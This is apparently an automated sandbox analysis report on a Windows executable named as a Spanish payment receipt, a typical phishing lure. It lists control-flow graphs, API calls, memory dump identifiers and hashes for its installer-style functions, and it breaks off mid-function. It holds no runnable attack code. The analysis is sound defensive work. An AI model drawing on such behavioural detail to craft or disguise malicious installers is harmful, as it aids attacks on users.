                                                                                                                                                                                    control_flow_graph 500 405c13-405c39 call 405ede 503 405c52-405c59 500->503 504 405c3b-405c4d DeleteFileW 500->504 506 405c5b-405c5d 503->506 507 405c6c-405c7c call 406507 503->507 505 405dcf-405dd3 504->505 508 405c63-405c66 506->508 509 405d7d-405d82 506->509 513 405c8b-405c8c call 405e22 507->513 514 405c7e-405c89 lstrcatW 507->514 508->507 508->509 509->505 512 405d84-405d87 509->512 515 405d91-405d99 call 40683d 512->515 516 405d89-405d8f 512->516 517 405c91-405c95 513->517 514->517 515->505 524 405d9b-405daf call 405dd6 call 405bcb 515->524 516->505 520 405ca1-405ca7 lstrcatW 517->520 521 405c97-405c9f 517->521 523 405cac-405cc8 lstrlenW FindFirstFileW 520->523 521->520 521->523 525 405d72-405d76 523->525 526 405cce-405cd6 523->526 540 405db1-405db4 524->540 541 405dc7-405dca call 405569 524->541 525->509 528 405d78 525->528 529 405cf6-405d0a call 406507 526->529 530 405cd8-405ce0 526->530 528->509 542 405d21-405d2c call 405bcb 529->542 543 405d0c-405d14 529->543 533 405ce2-405cea 530->533 534 405d55-405d65 FindNextFileW 530->534 533->529 539 405cec-405cf4 533->539 534->526 538 405d6b-405d6c FindClose 534->538 538->525 539->529 539->534 540->516 544 405db6-405dc5 call 405569 call 4062c7 540->544 541->505 553 405d4d-405d50 call 405569 542->553 554 405d2e-405d31 542->554 543->534 545 405d16-405d1f call 405c13 543->545 544->505 545->534 553->534 557 405d33-405d43 call 405569 call 4062c7 554->557 558 405d45-405d4b 554->558 557->534 558->534
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                                                                                                                                                                    • lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C84
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CA7
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405D6C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                    • API String ID: 2035342205-4130279798
                                                                                                                                                                                    • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                                    • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                                                                                                                                                                    Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 727 406bfe-406c03 728 406c74-406c92 727->728 729 406c05-406c34 727->729 732 40726a-40727f 728->732 730 406c36-406c39 729->730 731 406c3b-406c3f 729->731 733 406c4b-406c4e 730->733 734 406c41-406c45 731->734 735 406c47 731->735 736 407281-407297 732->736 737 407299-4072af 732->737 738 406c50-406c59 733->738 739 406c6c-406c6f 733->739 734->733 735->733 740 4072b2-4072b9 736->740 737->740 743 406c5b 738->743 744 406c5e-406c6a 738->744 745 406e41-406e5f 739->745 741 4072e0-4072ec 740->741 742 4072bb-4072bf 740->742 755 406a82-406a8b 741->755 746 4072c5-4072dd 742->746 747 40746e-407478 742->747 743->744 751 406cd4-406d02 744->751 749 406e61-406e75 745->749 750 406e77-406e89 745->750 746->741 752 407484-407497 747->752 756 406e8c-406e96 749->756 750->756 753 406d04-406d1c 751->753 754 406d1e-406d38 751->754 758 40749c-4074a0 752->758 757 406d3b-406d45 753->757 754->757 761 406a91 755->761 762 407499 755->762 759 406e98 756->759 760 406e39-406e3f 756->760 764 406d4b 757->764 765 406cbc-406cc2 757->765 766 406e14-406e18 759->766 767 406fa9-406fb6 759->767 760->745 763 406ddd-406de7 760->763 768 406a98-406a9c 761->768 769 406bd8-406bf9 761->769 770 406b3d-406b41 761->770 771 406bad-406bb1 761->771 762->758 772 40742c-407436 763->772 773 406ded-406e0f 763->773 789 406ca1-406cb9 764->789 790 407408-407412 764->790 774 406d75-406d7b 765->774 775 406cc8-406cce 765->775 778 407420-40742a 766->778 779 406e1e-406e36 766->779 767->755 768->752 783 406aa2-406aaf 768->783 769->732 781 406b47-406b60 770->781 782 4073ed-4073f7 770->782 776 406bb7-406bcb 771->776 777 4073fc-407406 771->777 772->752 773->767 785 406dd9 774->785 787 406d7d-406d9b 774->787 775->751 775->785 786 406bce-406bd6 776->786 777->752 778->752 779->760 788 406b63-406b67 781->788 782->752 783->762 784 406ab5-406afb 783->784 791 406b23-406b25 784->791 792 406afd-406b01 784->792 785->763 786->769 786->771 793 406db3-406dc5 787->793 794 406d9d-406db1 787->794 788->770 795 406b69-406b6f 788->795 789->765 790->752 798 406b33-406b3b 791->798 799 406b27-406b31 791->799 796 406b03-406b06 GlobalFree 792->796 797 406b0c-406b1a GlobalAlloc 792->797 800 406dc8-406dd2 793->800 794->800 801 406b71-406b78 795->801 802 406b99-406bab 795->802 796->797 797->762 803 406b20 797->803 798->788 799->798 799->799 800->774 806 406dd4 800->806 804 406b83-406b93 GlobalAlloc 801->804 805 406b7a-406b7d GlobalFree 801->805 802->786 803->791 804->762 804->802 805->804 808 407414-40741e 806->808 809 406d5a-406d72 806->809 808->752 809->774
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                                    • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                                                                                                                                                    • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                                                                                                                                                    Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406854
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                    • String ID: XgB
                                                                                                                                                                                    • API String ID: 2295610775-796949446
                                                                                                                                                                                    • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                                    • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                                                                                                                                                                    Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 194 403f64-403f76 195 403f7c-403f82 194->195 196 4040dd-4040ec 194->196 195->196 199 403f88-403f91 195->199 197 40413b-404150 196->197 198 4040ee-404136 GetDlgItem * 2 call 404463 SetClassLongW call 40140b 196->198 201 404190-404195 call 4044af 197->201 202 404152-404155 197->202 198->197 203 403f93-403fa0 SetWindowPos 199->203 204 403fa6-403fad 199->204 218 40419a-4041b5 201->218 206 404157-404162 call 401389 202->206 207 404188-40418a 202->207 203->204 209 403ff1-403ff7 204->209 210 403faf-403fc9 ShowWindow 204->210 206->207 234 404164-404183 SendMessageW 206->234 207->201 217 404430 207->217 214 404010-404013 209->214 215 403ff9-40400b DestroyWindow 209->215 211 4040ca-4040d8 call 4044ca 210->211 212 403fcf-403fe2 GetWindowLongW 210->212 222 404432-404439 211->222 212->211 219 403fe8-403feb ShowWindow 212->219 223 404015-404021 SetWindowLongW 214->223 224 404026-40402c 214->224 221 40440d-404413 215->221 217->222 227 4041b7-4041b9 call 40140b 218->227 228 4041be-4041c4 218->228 219->209 221->217 230 404415-40441b 221->230 223->222 224->211 233 404032-404041 GetDlgItem 224->233 227->228 231 4041ca-4041d5 228->231 232 4043ee-404407 DestroyWindow EndDialog 228->232 230->217 236 40441d-404426 ShowWindow 230->236 231->232 237 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 231->237 232->221 238 404060-404063 233->238 239 404043-40405a SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 237->266 267 40422a-40422f 237->267 241 404065-404066 238->241 242 404068-40406b 238->242 239->217 239->238 244 404096-40409b call 40443c 241->244 245 404079-40407e 242->245 246 40406d-404073 242->246 244->211 249 4040b4-4040c4 SendMessageW 245->249 251 404080-404086 245->251 246->249 250 404075-404077 246->250 249->211 250->244 252 404088-40408e call 40140b 251->252 253 40409d-4040a6 call 40140b 251->253 262 404094 252->262 253->211 263 4040a8-4040b2 253->263 262->244 263->262 270 404270-404271 266->270 271 404273 266->271 267->266 272 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042a5-4042b6 SendMessageW 272->273 274 4042b8 272->274 275 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 273->275 274->275 275->218 286 404303-404305 275->286 286->218 287 40430b-40430f 286->287 288 404311-404317 287->288 289 40432e-404342 DestroyWindow 287->289 288->217 290 40431d-404323 288->290 289->221 291 404348-404375 CreateDialogParamW 289->291 290->218 292 404329 290->292 291->221 293 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 4043d4-4043e7 ShowWindow call 4044af 293->298 300 4043ec 298->300 300->221
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004040FD
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                                                                    • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 121052019-0
                                                                                                                                                                                    • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                                    • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                                                                                                                                                                    Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 301 403bb6-403bce call 4068d4 304 403bd0-403be0 call 40644e 301->304 305 403be2-403c19 call 4063d5 301->305 314 403c3c-403c65 call 403e8c call 405ede 304->314 310 403c31-403c37 lstrcatW 305->310 311 403c1b-403c2c call 4063d5 305->311 310->314 311->310 319 403cf7-403cff call 405ede 314->319 320 403c6b-403c70 314->320 326 403d01-403d08 call 406544 319->326 327 403d0d-403d32 LoadImageW 319->327 320->319 321 403c76-403c9e call 4063d5 320->321 321->319 328 403ca0-403ca4 321->328 326->327 330 403db3-403dbb call 40140b 327->330 331 403d34-403d64 RegisterClassW 327->331 332 403cb6-403cc2 lstrlenW 328->332 333 403ca6-403cb3 call 405e03 328->333 344 403dc5-403dd0 call 403e8c 330->344 345 403dbd-403dc0 330->345 334 403e82 331->334 335 403d6a-403dae SystemParametersInfoW CreateWindowExW 331->335 339 403cc4-403cd2 lstrcmpiW 332->339 340 403cea-403cf2 call 405dd6 call 406507 332->340 333->332 338 403e84-403e8b 334->338 335->330 339->340 343 403cd4-403cde GetFileAttributesW 339->343 340->319 348 403ce0-403ce2 343->348 349 403ce4-403ce5 call 405e22 343->349 354 403dd6-403df0 ShowWindow call 406864 344->354 355 403e59-403e5a call 40563c 344->355 345->338 348->340 348->349 349->340 362 403df2-403df7 call 406864 354->362 363 403dfc-403e0e GetClassInfoW 354->363 359 403e5f-403e61 355->359 360 403e63-403e69 359->360 361 403e7b-403e7d call 40140b 359->361 360->345 364 403e6f-403e76 call 40140b 360->364 361->334 362->363 367 403e10-403e20 GetClassInfoW RegisterClassW 363->367 368 403e26-403e49 DialogBoxParamW call 40140b 363->368 364->345 367->368 372 403e4e-403e57 call 403b06 368->372 372->338
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                                      • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                                    • lstrcatW.KERNEL32(1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C37
                                                                                                                                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner), ref: 00403D1E
                                                                                                                                                                                      • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                                    • RegisterClassW.USER32(004291C0), ref: 00403D5B
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
                                                                                                                                                                                    • RegisterClassW.USER32(004291C0), ref: 00403E20
                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                    • API String ID: 1975747703-1964700046
                                                                                                                                                                                    • Opcode ID: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                                                                                                                                                                                    • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                                                                                                                                                                                    • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                                                                                                                                                                    Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 378 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 403499 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034af call 403499 394->397 398 403227-403251 GlobalAlloc call 4034af call 4032b4 394->398 395->380 397->395 423 40321f-403225 397->423 398->395 421 403264-403275 398->421 401->395 406 403143-403157 call 405fb2 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 426 403159-403160 406->426 411 4031c3-4031ca call 403019 407->411 407->412 411->412 418 4031e0-4031e8 412->418 419 4031d3-4031dd call 4069c1 412->419 418->390 422 4031ee 418->422 419->418 428 403277 421->428 429 40327d-403282 421->429 422->387 423->395 423->398 426->412 427 403162-403169 426->427 427->412 431 40316b-403172 427->431 428->429 432 403283-403289 429->432 431->412 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fb2 432->434 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->422 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
